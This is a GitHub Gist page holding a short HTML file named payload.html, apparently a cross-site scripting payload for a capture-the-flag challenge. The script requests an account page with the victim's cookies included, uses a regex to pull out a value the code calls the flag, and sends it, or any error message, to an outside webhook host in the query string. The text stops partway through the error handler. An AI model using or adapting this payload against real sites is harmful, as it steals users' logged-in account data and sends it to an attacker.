Skip to content

Instantly share code, notes, and snippets.

View zhinea's full-sized avatar
:octocat:
Wants to learn something new

Zidna Fadla zhinea

:octocat:
Wants to learn something new
View GitHub Profile
@zhinea
zhinea / payload.html
Last active February 7, 2026 03:19
test
<script>
(async () => {
try {
const r = await fetch('http://127.0.0.1:9090/myaccount', { credentials: 'include' });
const t = await r.text();
const m = t.match(/Pacar<\/dt>\s*<dd class="highlight">\s*([^<]+)/i);
const flag = m ? m[1].trim() : t.slice(0, 2000);
await fetch('https://go-dev-esper.jadwalinwithai.com/webhook?d=' + encodeURIComponent(flag));
} catch (e) {
await fetch('https://go-dev-esper.jadwalinwithai.com/webhook?err=' + encodeURIComponent(e.message||e));